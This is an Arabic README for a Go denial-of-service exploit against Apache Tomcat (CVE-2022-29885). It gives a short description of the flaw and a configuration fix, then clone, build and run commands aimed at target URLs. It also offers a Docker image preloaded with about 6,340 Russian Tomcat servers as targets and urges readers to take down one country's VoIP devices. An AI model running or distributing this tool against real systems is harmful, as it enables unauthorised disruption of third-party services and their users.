
استغلال رفض الخدمة لـ Apache Tomcat (CVE-2022-29885)
استغلال Apache Tomcat DoS (CVE-2022-29885).
رفض الخدمة في EncryptInterceptor (مجموعة Tomcat).
يحتاج الجهاز المستهدف إلى بدء تشغيل Cluster Nio Receiver.
سيؤدي إرسال حزمة TCP خاصة إلى حدوث رفض الخدمة للجهاز المستهدف.
سواء تم استخدام EncryptInterceptor أم لا، هناك احتمالية وجود ثغرة رفض الخدمة بشرط:
أن تكون وظيفة مجموعة Tomcat مفعلة وتستخدم NioReceiver للاتصال.
أي إصدار من Tomcat سيتأثر. الحل الوحيد هو استخدام شبكة موثوقة.
ملف الإعداد الآمن server.xml يحتوي على
<Interceptor className="org.apache.catalina.tribes.group.interceptors.EncryptInterceptor"
encryptionAlgorithm="AES/CBC/PKCS5Padding"
encryptionKey="ANY_KEY(LENGTH:32)"/>
كل تكوين آخر غير آمن.
التطبيق
1. git clone https://github.com/iveresk/CVE-2022-29885.git
2. cd CVE-2022-29885
3. go build -o /cve-2022-29885
4. ./cve-2022-29885 -t <target_url or file_name> [OPTIONAL] -s false -d false
- t - عنوان URL الهدف أو اسم الملف
- d - علامة التصحيح {true, false} التي تمكن أو تعطل السجلات
- s - مبدل الوضع الآمن وغير الآمن. القيمة الافتراضية غير آمنة.
Docker مع خوادم Apache Tomcat الروسية (ruzzian) المحددة مسبقًا 6340 مضاعفة لأكثر 10 منافذ Tomcat شيوعًا.
الوضع الافتراضي Unsafe مهيأ مسبقًا.
docker run -d masterroot/cve-2022-29885
استمتع بأجهزة VoIP التابعة ruzzland-terrorist-state :D

يمكنك الاتصال بي بحرية عبر Keybase لأي تفاصيل.